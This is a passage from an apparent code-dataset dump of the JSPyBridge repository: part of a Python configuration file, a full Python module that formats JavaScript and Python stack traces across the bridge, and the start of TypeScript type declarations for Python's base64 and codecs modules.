Currently this breaks GC\nfast_mode = False\n# Whether we need patches for legacy node versions\nnode_emitter_patches = False\n\n\nif (\"DEBUG\" in os.environ) and (\"jspybridge\" in os.getenv(\"DEBUG\")):\n debug = print\nelse:\n debug = lambda *a: a\n\n\ndef is_main_loop_active():\n if not event_thread or event_loop:\n return False\n return event_thread.is_alive() and event_loop.active\n\n\ndead = \"\\n** The Node process has crashed. Please restart the runtime to use JS APIs. **\\n\"\n" }, { "alpha_fraction": 0.530899703502655, "alphanum_fraction": 0.5491520762443542, "avg_line_length": 27.28455352783203, "blob_id": "fd91fdd43bfafd9b28380eeed567894da37d2691", "content_id": "f00d4b93e5c49e4bd62b06b513d610c09e2e7109", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6963, "license_type": "permissive", "max_line_length": 100, "num_lines": 246, "path": "/src/javascript/errors.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import re, sys, traceback\n\n\nclass JavaScriptError(Exception):\n def __init__(self, call, jsStackTrace, pyStacktrace=None):\n self.call = call\n self.js = jsStackTrace\n self.py = pyStacktrace\n\n\nclass Chalk:\n def red(self, text):\n return \"\\033[91m\" + text + \"\\033[0m\"\n\n def blue(self, text):\n return \"\\033[94m\" + text + \"\\033[0m\"\n\n def green(self, text):\n return \"\\033[92m\" + text + \"\\033[0m\"\n\n def yellow(self, text):\n return \"\\033[93m\" + text + \"\\033[0m\"\n\n def bold(self, text):\n return \"\\033[1m\" + text + \"\\033[0m\"\n\n def italic(self, text):\n return \"\\033[3m\" + text + \"\\033[0m\"\n\n def underline(self, text):\n return \"\\033[4m\" + text + \"\\033[0m\"\n\n def gray(self, text):\n return \"\\033[2m\" + text + \"\\033[0m\"\n\n def bgred(self, text):\n return \"\\033[41m\" + text + \"\\033[0m\"\n\n def darkred(self, text):\n return \"\\033[31m\" + text + \"\\033[0m\"\n\n def lightgray(self, text):\n return \"\\033[37m\" + text + \"\\033[0m\"\n\n def white(self, text):\n return \"\\033[97m\" + text + \"\\033[0m\"\n\n\nchalk = Chalk()\n\n\ndef format_line(line):\n if line.startswith(\"<\") or line.startswith(\"\\\\\"):\n return line\n statements = [\n \"const \",\n \"await \",\n \"import \",\n \"let \",\n \"var \",\n \"async \",\n \"self \",\n \"def \",\n \"return \",\n \"from \",\n \"for \",\n \"raise \",\n \"try \",\n \"except \",\n \"catch \",\n \":\",\n \"\\\\(\",\n \"\\\\)\",\n \"\\\\+\",\n \"\\\\-\",\n \"\\\\*\",\n \"=\",\n ]\n secondary = [\"{\", \"}\", \"'\", \" true\", \" false\"]\n for statement in statements:\n exp = re.compile(statement, re.DOTALL)\n line = re.sub(exp, chalk.red(statement.replace(\"\\\\\", \"\")) + \"\", line)\n for second in secondary:\n exp = re.compile(second, re.DOTALL)\n line = re.sub(exp, chalk.blue(second) + \"\", line)\n return line\n\n\ndef print_error(failedCall, jsErrorline, jsStackTrace, jsErrorMessage, pyErrorline, pyStacktrace):\n lines = []\n log = lambda *s: lines.append(\" \".join(s))\n log(\n \"☕\",\n chalk.bold(chalk.bgred(\" JavaScript Error \")),\n f\"Call to '{failedCall.replace('~~', '')}' failed:\",\n )\n\n for at, line in pyStacktrace:\n if \"javascript\" in at or \"IPython\" in at:\n continue\n if not line:\n log(\" \", chalk.gray(at))\n else:\n log(chalk.gray(\">\"), format_line(line))\n log(\" \", chalk.gray(at))\n\n log(chalk.gray(\">\"), format_line(pyErrorline))\n\n log(\"\\n... across the bridge ...\\n\")\n\n for traceline in reversed(jsStackTrace):\n log(\" \", chalk.gray(traceline))\n\n log(chalk.gray(\">\"), format_line(jsErrorline))\n log(\"🌉\", chalk.bold(jsErrorMessage))\n\n return lines\n\n\ndef processPyStacktrace(stack):\n lines = []\n error_line = \"\"\n stacks = stack\n\n for lin in stacks:\n lin = lin.rstrip()\n if lin.startswith(\" File\"):\n tokens = lin.split(\"\\n\")\n lin = tokens[0]\n Code = tokens[1] if len(tokens) > 1 else chalk.italic(\"<via standard input>\")\n fname = lin.split('\"')[1]\n line = re.search(r\"\\, line (\\d+)\", lin).group(1)\n at = re.search(r\"\\, in (.*)\", lin)\n if at:\n at = at.group(1)\n else:\n at = \"^\"\n lines.append([f\"at {at} ({fname}:{line})\", Code.strip()])\n elif lin.strip():\n error_line = lin.strip()\n\n return error_line, lines\n\n\nINTERNAL_FILES = [\"bridge.js\", \"pyi.js\", \"errors.js\", \"deps.js\", \"test.js\"]\n\n\ndef isInternal(file):\n for f in INTERNAL_FILES:\n if f in file:\n return True\n return False\n\n\ndef processJsStacktrace(stack, allowInternal=False):\n lines = []\n message_line = \"\"\n error_line = \"\"\n found_main_line = False\n # print(\"Allow internal\", allowInternal)\n stacks = stack if (type(stack) is list) else stack.split(\"\\n\")\n for line in stacks:\n if not message_line:\n message_line = line\n if allowInternal:\n lines.append(line.strip())\n elif (not isInternal(line)) and (not found_main_line):\n abs_path = re.search(r\"\\((.*):(\\d+):(\\d+)\\)\", line)\n file_path = re.search(r\"(file:\\/\\/.*):(\\d+):(\\d+)\", line)\n base_path = re.search(r\"at (.*):(\\d+):(\\d+)$\", line)\n if abs_path or file_path or base_path:\n path = abs_path or file_path or base_path\n fpath, errorline, char = path.groups()\n if fpath.startswith(\"node:\"):\n continue\n with open(fpath, \"r\") as f:\n flines = f.readlines()\n error_line = flines[int(errorline) - 1].strip()\n lines.append(line.strip())\n found_main_line = True\n elif found_main_line:\n lines.append(line.strip())\n\n if allowInternal and not error_line:\n error_line = \"^\"\n return (error_line, message_line, lines) if error_line else None\n\n\ndef getErrorMessage(failed_call, jsStackTrace, pyStacktrace):\n try:\n jse, jsm, jss = processJsStacktrace(jsStackTrace) or processJsStacktrace(jsStackTrace, True)\n pye, pys = processPyStacktrace(pyStacktrace)\n\n lines = print_error(failed_call, jse, jss, jsm, pye, pys)\n return \"\\n\".join(lines)\n except Exception as e:\n print(\"Error in exception handler\")\n import traceback\n\n print(e)\n pys = \"\\n\".join(pyStacktrace)\n print(f\"** JavaScript Stacktrace **\\n{jsStackTrace}\\n** Python Stacktrace **\\n{pys}\")\n return \"\"\n\n\n# Custom exception logic\n\n# Fix for IPython as it blocks the exception hook\n# https://stackoverflow.com/a/28758396/11173996\ntry:\n __IPYTHON__\n import IPython.core.interactiveshell\n\n oldLogger = IPython.core.interactiveshell.InteractiveShell.showtraceback\n\n def newLogger(*a, **kw):\n ex_type, ex_inst, tb = sys.exc_info()\n if ex_type is JavaScriptError:\n pyStacktrace = traceback.format_tb(tb)\n # The Python part of the stack trace is already printed by IPython\n print(getErrorMessage(ex_inst.call, ex_inst.js, pyStacktrace))\n else:\n oldLogger(*a, **kw)\n\n IPython.core.interactiveshell.InteractiveShell.showtraceback = newLogger\nexcept NameError:\n pass\n\norig_excepthook = sys.excepthook\n\n\ndef error_catcher(error_type, error, error_traceback):\n \"\"\"\n Catches JavaScript exceptions and prints them to the console.\n \"\"\"\n if error_type is JavaScriptError:\n pyStacktrace = traceback.format_tb(error_traceback)\n jsStacktrace = error.js\n message = getErrorMessage(error.call, jsStacktrace, pyStacktrace)\n print(message, file=sys.stderr)\n else:\n orig_excepthook(error_type, error, error_traceback)\n\n\nsys.excepthook = error_catcher\n# ====\n" }, { "alpha_fraction": 0.6147538423538208, "alphanum_fraction": 0.6185370087623596, "avg_line_length": 31.507774353027344, "blob_id": "28c726dd2e93cef4accf2aee777c92a9249b1a4c", "content_id": "648e5dfa8ce8356a9b127dd1ad08c37efdfd1e17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "TypeScript", "length_bytes": 443305, "license_type": "permissive", "max_line_length": 814, "num_lines": 13636, "path": "/src/pythonia/py.stdlib.d.ts", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "declare type sqlite3_default = typeof sqlite3.dbapi2\ndeclare type tkinter_default = typeof tkinter.constants\ndeclare module base64 {\n\tvar _\n\n\t/**\n\t * Encode the bytes-like object s using Base64 and return a bytes object.\n\t * \n\t * Optional altchars should be a byte string of length 2 which specifies an\n\t * alternative alphabet for the '+' and '/' characters. This allows an\n\t * application to e.g. generate url or filesystem safe Base64 strings.\n\t * \n\t */\n\tfunction b64encode(s, altchars?): Promise<any>\n\tfunction b64encode$({ s, altchars }: { s, altchars?}): Promise<any>\n\n\t/**\n\t * Decode the Base64 encoded bytes-like object or ASCII string s.\n\t * \n\t * Optional altchars must be a bytes-like object or ASCII string of length 2\n\t * which specifies the alternative alphabet used instead of the '+' and '/'\n\t * characters.\n\t * \n\t * The result is returned as a bytes object. A binascii.Error is raised if\n\t * s is incorrectly padded.\n\t * \n\t * If validate is False (the default), characters that are neither in the\n\t * normal base-64 alphabet nor the alternative alphabet are discarded prior\n\t * to the padding check. If validate is True, these non-alphabet characters\n\t * in the input result in a binascii.Error.\n\t * \n\t */\n\tfunction b64decode(s, altchars?, validate?: boolean): Promise<any>\n\tfunction b64decode$({ s, altchars, validate }: { s, altchars?, validate?}): Promise<any>\n\n\t/**\n\t * Encode bytes-like object s using the standard Base64 alphabet.\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction standard_b64encode(s): Promise<any>\n\tfunction standard_b64encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode bytes encoded with the standard Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object or ASCII string to decode. The result\n\t * is returned as a bytes object. A binascii.Error is raised if the input\n\t * is incorrectly padded. Characters that are not in the standard alphabet\n\t * are discarded prior to the padding check.\n\t * \n\t */\n\tfunction standard_b64decode(s): Promise<any>\n\tfunction standard_b64decode$({ s }): Promise<any>\n\n\t/**\n\t * Encode bytes using the URL- and filesystem-safe Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object to encode. The result is returned as a\n\t * bytes object. The alphabet uses '-' instead of '+' and '_' instead of\n\t * '/'.\n\t * \n\t */\n\tfunction urlsafe_b64encode(s): Promise<any>\n\tfunction urlsafe_b64encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode bytes using the URL- and filesystem-safe Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object or ASCII string to decode. The result\n\t * is returned as a bytes object. A binascii.Error is raised if the input\n\t * is incorrectly padded. Characters that are not in the URL-safe base-64\n\t * alphabet, and are not a plus '+' or slash '/', are discarded prior to the\n\t * padding check.\n\t * \n\t * The alphabet uses '-' instead of '+' and '_' instead of '/'.\n\t * \n\t */\n\tfunction urlsafe_b64decode(s): Promise<any>\n\tfunction urlsafe_b64decode$({ s }): Promise<any>\n\tfunction b32encode(s): Promise<any>\n\tfunction b32encode$({ s }): Promise<any>\n\tfunction b32decode(s, casefold?: boolean, map01?): Promise<any>\n\tfunction b32decode$({ s, casefold, map01 }: { s, casefold?, map01?}): Promise<any>\n\tfunction b32hexencode(s): Promise<any>\n\tfunction b32hexencode$({ s }): Promise<any>\n\tfunction b32hexdecode(s, casefold?: boolean): Promise<any>\n\tfunction b32hexdecode$({ s, casefold }: { s, casefold?}): Promise<any>\n\n\t/**\n\t * Encode the bytes-like object s using Base16 and return a bytes object.\n\t * \n\t */\n\tfunction b16encode(s): Promise<any>\n\tfunction b16encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode the Base16 encoded bytes-like object or ASCII string s.\n\t * \n\t * Optional casefold is a flag specifying whether a lowercase alphabet is\n\t * acceptable as input. For security purposes, the default is False.\n\t * \n\t * The result is returned as a bytes object. A binascii.Error is raised if\n\t * s is incorrectly padded or if there are non-alphabet characters present\n\t * in the input.\n\t * \n\t */\n\tfunction b16decode(s, casefold?: boolean): Promise<any>\n\tfunction b16decode$({ s, casefold }: { s, casefold?}): Promise<any>\n\n\t/**\n\t * Encode bytes-like object b using Ascii85 and return a bytes object.\n\t * \n\t * foldspaces is an optional flag that uses the special short sequence 'y'\n\t * instead of 4 consecutive spaces (ASCII 0x20) as supported by 'btoa'. This\n\t * feature is not supported by the \"standard\" Adobe encoding.\n\t * \n\t * wrapcol controls whether the output should have newline (b'\\n') characters\n\t * added to it. If this is non-zero, each output line will be at most this\n\t * many characters long.\n\t * \n\t * pad controls whether the input is padded to a multiple of 4 before\n\t * encoding. Note that the btoa implementation always pads.\n\t * \n\t * adobe controls whether the encoded byte sequence is framed with <~ and ~>,\n\t * which is used by the Adobe implementation.\n\t * \n\t */\n\tfunction a85encode(b): Promise<any>\n\tfunction a85encode$({ b }): Promise<any>\n\n\t/**\n\t * Decode the Ascii85 encoded bytes-like object or ASCII string b.\n\t * \n\t * foldspaces is a flag that specifies whether the 'y' short sequence should be\n\t * accepted as shorthand for 4 consecutive spaces (ASCII 0x20). This feature is\n\t * not supported by the \"standard\" Adobe encoding.\n\t * \n\t * adobe controls whether the input sequence is in Adobe Ascii85 format (i.e.\n\t * is framed with <~ and ~>).\n\t * \n\t * ignorechars should be a byte string containing characters to ignore from the\n\t * input. This should only contain whitespace characters, and by default\n\t * contains all whitespace characters in ASCII.\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction a85decode(b): Promise<any>\n\tfunction a85decode$({ b }): Promise<any>\n\n\t/**\n\t * Encode bytes-like object b in base85 format and return a bytes object.\n\t * \n\t * If pad is true, the input is padded with b'\\0' so its length is a multiple of\n\t * 4 bytes before encoding.\n\t * \n\t */\n\tfunction b85encode(b, pad?: boolean): Promise<any>\n\tfunction b85encode$({ b, pad }: { b, pad?}): Promise<any>\n\n\t/**\n\t * Decode the base85-encoded bytes-like object or ASCII string b\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction b85decode(b): Promise<any>\n\tfunction b85decode$({ b }): Promise<any>\n\n\t/**\n\t * Encode a file; input and output are binary files.\n\t */\n\tfunction encode(input, output): Promise<any>\n\tfunction encode$({ input, output }): Promise<any>\n\n\t/**\n\t * Decode a file; input and output are binary files.\n\t */\n\tfunction decode(input, output): Promise<any>\n\tfunction decode$({ input, output }): Promise<any>\n\n\t/**\n\t * Encode a bytestring into a bytes object containing multiple lines\n\t * of base-64 data.\n\t */\n\tfunction encodebytes(s): Promise<any>\n\tfunction encodebytes$({ s }): Promise<any>\n\n\t/**\n\t * Decode a bytestring of base-64 data into a bytes object.\n\t */\n\tfunction decodebytes(s): Promise<any>\n\tfunction decodebytes$({ s }): Promise<any>\n\n\t/**\n\t * Small main program\n\t */\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\tfunction test(): Promise<any>\n\tfunction test$($: {}): Promise<any>\n\tlet bytes_types: Promise<any>\n\tlet MAXLINESIZE: Promise<any>\n\tlet MAXBINSIZE: Promise<any>\n}\ndeclare module codecs {\n\tvar _\n\n\t/**\n\t * Open an encoded file using the given mode and return\n\t * a wrapped version providing transparent encoding/decoding.\n\t * \n\t * Note: The wrapped version will only accept the object format\n\t * defined by the codecs, i.e. Unicode objects for most builtin\n\t * codecs. Output is also codec dependent and will usually be\n\t * Unicode as well.\n\t * \n\t * Underlying encoded files are always opened in binary mode.\n\t * The default file mode is 'r', meaning to open the file in read mode.\n\t * \n\t * encoding specifies the encoding which is to be used for the\n\t * file.\n\t * \n\t * errors may be given to define the error handling. It defaults\n\t * to 'strict' which causes ValueErrors to be raised in case an\n\t * encoding error occurs.\n\t * \n\t * buffering has the same meaning as for the builtin open() API.\n\t * It defaults to -1 which means that the default buffer size will\n\t * be used.\n\t * \n\t * The returned wrapped file object provides an extra attribute\n\t * .encoding which allows querying the used encoding. This\n\t * attribute is only available if an encoding was specified as\n\t * parameter.\n\t * \n\t * \n\t */\n\tfunction open(filename, mode?, encoding?, errors?, buffering?): Promise<any>\n\tfunction open$({ filename, mode, encoding, errors, buffering }: { filename, mode?, encoding?, errors?, buffering?}): Promise<any>\n\n\t/**\n\t * Return a wrapped version of file which provides transparent\n\t * encoding translation.\n\t * \n\t * Data written to the wrapped file is decoded according\n\t * to the given data_encoding and then encoded to the underlying\n\t * file using file_encoding. The intermediate data type\n\t * will usually be Unicode but depends on the specified codecs.\n\t * \n\t * Bytes read from the file are decoded using file_encoding and then\n\t * passed back to the caller encoded using data_encoding.\n\t * \n\t * If file_encoding is not given, it defaults to data_encoding.\n\t * \n\t * errors may be given to define the error handling. It defaults\n\t * to 'strict' which causes ValueErrors to be raised in case an\n\t * encoding error occurs.\n\t * \n\t * The returned wrapped file object provides two extra attributes\n\t * .data_encoding and .file_encoding which reflect the given\n\t * parameters of the same name. The attributes can be used for\n\t * introspection by Python programs.\n\t * \n\t * \n\t */\n\tfunction EncodedFile(file, data_encoding, file_encoding?, errors?): Promise<any>\n\tfunction EncodedFile$({ file, data_encoding, file_encoding, errors }: { file, data_encoding, file_encoding?, errors?}): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its encoder function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getencoder(encoding): Promise<any>\n\tfunction getencoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its decoder function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getdecoder(encoding): Promise<any>\n\tfunction getdecoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its IncrementalEncoder class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found\n\t * or the codecs doesn't provide an incremental encoder.\n\t * \n\t * \n\t */\n\tfunction getincrementalencoder(encoding): Promise<any>\n\tfunction getincrementalencoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its IncrementalDecoder class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found\n\t * or the codecs doesn't provide an incremental decoder.\n\t * \n\t * \n\t */\n\tfunction getincrementaldecoder(encoding): Promise<any>\n\tfunction getincrementaldecoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its StreamReader class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getreader(encoding): Promise<any>\n\tfunction getreader$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its StreamWriter class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getwriter(encoding): Promise<any>\n\tfunction getwriter$({ encoding }): Promise<any>\n\n\t/**\n\t * \n\t * Encoding iterator.\n\t * \n\t * Encodes the input strings from the iterator using an IncrementalEncoder.\n\t * \n\t * errors and kwargs are passed through to the IncrementalEncoder\n\t * constructor.\n\t * \n\t */\n\tfunction iterencode(iterator, encoding, errors?): Promise<any>\n\tfunction iterencode$({ iterator, encoding, errors }: { iterator, encoding, errors?}): Promise<any>\n\n\t/**\n\t * \n\t * Decoding iterator.\n\t * \n\t * Decodes the input strings from the iterator using an IncrementalDecoder.\n\t * \n\t * errors and kwargs are passed through to the IncrementalDecoder\n\t * constructor.\n\t * \n\t */\n\tfunction iterdecode(iterator, encoding, errors?): Promise<any>\n\tfunction iterdecode$({ iterator, encoding, errors }: { iterator, encoding, errors?}): Promise<any>\n\n\t/**\n\t * make_identity_dict(rng) -> dict\n\t * \n\t * Return a dictionary where elements of the rng sequence are\n\t * mapped to themselves.\n\t * \n\t * \n\t */\n\tfunction make_identity_dict(rng): Promise<any>\n\tfunction make_identity_dict$({ rng }): Promise<any>\n\n\t/**\n\t * Creates an encoding map from a decoding map.\n\t * \n\t * If a target mapping in the decoding map occurs multiple\n\t * times, then that target is mapped to None (undefined mapping),\n\t * causing an exception when encountered by the charmap codec\n\t * during translation.\n\t * \n\t * One example where this happens is cp875.py which decodes\n\t * multiple character to \\u001a.\n\t * \n\t * \n\t */\n\tfunction make_encoding_map(decoding_map): Promise<any>\n\tfunction make_encoding_map$({ decoding_map }): Promise<any>\n\n\t/**\n\t * Codec details when looking up the codec registry\n\t */\n\tinterface ICodecInfo {\n\t}\n\n\t/**\n\t * Defines the interface for stateless encoders/decoders.\n\t * \n\t * The .encode()/.decode() methods may use different error\n\t * handling schemes by providing the errors argument. These\n\t * string values are predefined:\n\t * \n\t * 'strict' - raise a ValueError error (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace' - replace with a suitable replacement character;\n\t * Python will use the official U+FFFD REPLACEMENT\n\t * CHARACTER for the builtin Unicode codecs on\n\t * decoding and '?' on encoding.\n\t * 'surrogateescape' - replace with private code points U+DCnn.\n\t * 'xmlcharrefreplace' - Replace with the appropriate XML\n\t * character reference (only for encoding).\n\t * 'backslashreplace' - Replace with backslashed escape sequences.\n\t * 'namereplace' - Replace with \\N{...} escape sequences\n\t * (only for encoding).\n\t * \n\t * The set of allowed values can be extended via register_error.\n\t * \n\t * \n\t */\n\tinterface ICodec {\n\n\t\t/**\n\t\t * Encodes the object input and returns a tuple (output\n\t\t * object, length consumed).\n\t\t * \n\t\t * errors defines the error handling to apply. It defaults to\n\t\t * 'strict' handling.\n\t\t * \n\t\t * The method may not store state in the Codec instance. Use\n\t\t * StreamWriter for codecs which have to keep state in order to\n\t\t * make encoding efficient.\n\t\t * \n\t\t * The encoder must be able to handle zero length input and\n\t\t * return an empty object of the output object type in this\n\t\t * situation.\n\t\t * \n\t\t * \n\t\t */\n\t\tencode(input, errors?): Promise<any>\n\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Decodes the object input and returns a tuple (output\n\t\t * object, length consumed).\n\t\t * \n\t\t * input must be an object which provides the bf_getreadbuf\n\t\t * buffer slot. Python strings, buffer objects and memory\n\t\t * mapped files are examples of objects providing this slot.\n\t\t * \n\t\t * errors defines the error handling to apply. It defaults to\n\t\t * 'strict' handling.\n\t\t * \n\t\t * The method may not store state in the Codec instance. Use\n\t\t * StreamReader for codecs which have to keep state in order to\n\t\t * make decoding efficient.\n\t\t * \n\t\t * The decoder must be able to handle zero length input and\n\t\t * return an empty object of the output object type in this\n\t\t * situation.\n\t\t * \n\t\t * \n\t\t */\n\t\tdecode(input, errors?): Promise<any>\n\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * An IncrementalEncoder encodes an input in multiple steps. The input can\n\t * be passed piece by piece to the encode() method. The IncrementalEncoder\n\t * remembers the state of the encoding process between calls to encode().\n\t * \n\t */\n\n\t/**\n\t * \n\t * Creates an IncrementalEncoder instance.\n\t * \n\t * The IncrementalEncoder may use different error handling schemes by\n\t * providing the errors keyword argument. See the module docstring\n\t * for a list of possible values.\n\t * \n\t */\n\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\tinterface IIncrementalEncoder {\n\n\t\t/**\n\t\t * \n\t\t * Encodes input and returns the resulting object.\n\t\t * \n\t\t */\n\t\tencode(input, final?: boolean): Promise<any>\n\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Resets the encoder to the initial state.\n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Return the current state of the encoder.\n\t\t * \n\t\t */\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Set the current state of the encoder. state must have been\n\t\t * returned by getstate().\n\t\t * \n\t\t */\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * This subclass of IncrementalEncoder can be used as the baseclass for an\n\t * incremental encoder if the encoder must keep some of the output in a\n\t * buffer between calls to encode().\n\t * \n\t */\n\tfunction BufferedIncrementalEncoder(errors?): Promise<IBufferedIncrementalEncoder>\n\tfunction BufferedIncrementalEncoder$({ errors }: { errors?}): Promise<IBufferedIncrementalEncoder>\n\tinterface IBufferedIncrementalEncoder extends IIncrementalEncoder {\n\t\tencode(input, final?: boolean): Promise<any>\n\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * An IncrementalDecoder decodes an input in multiple steps. The input can\n\t * be passed piece by piece to the decode() method. The IncrementalDecoder\n\t * remembers the state of the decoding process between calls to decode().\n\t * \n\t */\n\n\t/**\n\t * \n\t * Create an IncrementalDecoder instance.\n\t * \n\t * The IncrementalDecoder may use different error handling schemes by\n\t * providing the errors keyword argument. See the module docstring\n\t * for a list of possible values.\n\t * \n\t */\n\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\tinterface IIncrementalDecoder {\n\n\t\t/**\n\t\t * \n\t\t * Decode input and returns the resulting object.\n\t\t * \n\t\t */\n\t\tdecode(input, final?: boolean): Promise<any>\n\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Reset the decoder to the initial state.\n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Return the current state of the decoder.\n\t\t * \n\t\t * This must be a (buffered_input, additional_state_info) tuple.\n\t\t * buffered_input must be a bytes object containing bytes that\n\t\t * were passed to decode() that have not yet been converted.\n\t\t * additional_state_info must be a non-negative integer\n\t\t * representing the state of the decoder WITHOUT yet having\n\t\t * processed the contents of buffered_input. In the initial state\n\t\t * and after reset(), getstate() must return (b\"\", 0).\n\t\t * \n\t\t */\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Set the current state of the decoder.\n\t\t * \n\t\t * state must have been returned by getstate(). The effect of\n\t\t * setstate((b\"\", 0)) must be equivalent to reset().\n\t\t * \n\t\t */\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * This subclass of IncrementalDecoder can be used as the baseclass for an\n\t * incremental decoder if the decoder must be able to handle incomplete\n\t * byte sequences.\n\t * \n\t */\n\tfunction BufferedIncrementalDecoder(errors?): Promise<IBufferedIncrementalDecoder>\n\tfunction BufferedIncrementalDecoder$({ errors }: { errors?}): Promise<IBufferedIncrementalDecoder>\n\tinterface IBufferedIncrementalDecoder extends IIncrementalDecoder {\n\t\tdecode(input, final?: boolean): Promise<any>\n\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * Creates a StreamWriter instance.\n\t * \n\t * stream must be a file-like object open for writing.\n\t * \n\t * The StreamWriter may use different error handling\n\t * schemes by providing the errors keyword argument. These\n\t * parameters are predefined:\n\t * \n\t * 'strict' - raise a ValueError (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace'- replace with a suitable replacement character\n\t * 'xmlcharrefreplace' - Replace with the appropriate XML\n\t * character reference.\n\t * 'backslashreplace' - Replace with backslashed escape\n\t * sequences.\n\t * 'namereplace' - Replace with \\N{...} escape sequences.\n\t * \n\t * The set of allowed parameter values can be extended via\n\t * register_error.\n\t * \n\t */\n\tfunction StreamWriter(stream, errors?): Promise<IStreamWriter>\n\tfunction StreamWriter$({ stream, errors }: { stream, errors?}): Promise<IStreamWriter>\n\tinterface IStreamWriter extends ICodec {\n\n\t\t/**\n\t\t * Writes the object's contents encoded to self.stream.\n\t\t * \n\t\t */\n\t\twrite(object): Promise<any>\n\t\twrite$({ object }): Promise<any>\n\n\t\t/**\n\t\t * Writes the concatenated list of strings to the stream\n\t\t * using .write().\n\t\t * \n\t\t */\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): Promise<any>\n\n\t\t/**\n\t\t * Resets the codec buffers used for keeping internal state.\n\t\t * \n\t\t * Calling this method should ensure that the data on the\n\t\t * output is put into a clean state, that allows appending\n\t\t * of new fresh data without having to rescan the whole\n\t\t * stream to recover state.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t}\n\n\t/**\n\t * Creates a StreamReader instance.\n\t * \n\t * stream must be a file-like object open for reading.\n\t * \n\t * The StreamReader may use different error handling\n\t * schemes by providing the errors keyword argument. These\n\t * parameters are predefined:\n\t * \n\t * 'strict' - raise a ValueError (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace'- replace with a suitable replacement character\n\t * 'backslashreplace' - Replace with backslashed escape sequences;\n\t * \n\t * The set of allowed parameter values can be extended via\n\t * register_error.\n\t * \n\t */\n\tfunction StreamReader(stream, errors?): Promise<IStreamReader>\n\tfunction StreamReader$({ stream, errors }: { stream, errors?}): Promise<IStreamReader>\n\tinterface IStreamReader extends ICodec {\n\t\tdecode(input, errors?): Promise<any>\n\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Decodes data from the stream self.stream and returns the\n\t\t * resulting object.\n\t\t * \n\t\t * chars indicates the number of decoded code points or bytes to\n\t\t * return. read() will never return more data than requested,\n\t\t * but it might return less, if there is not enough available.\n\t\t * 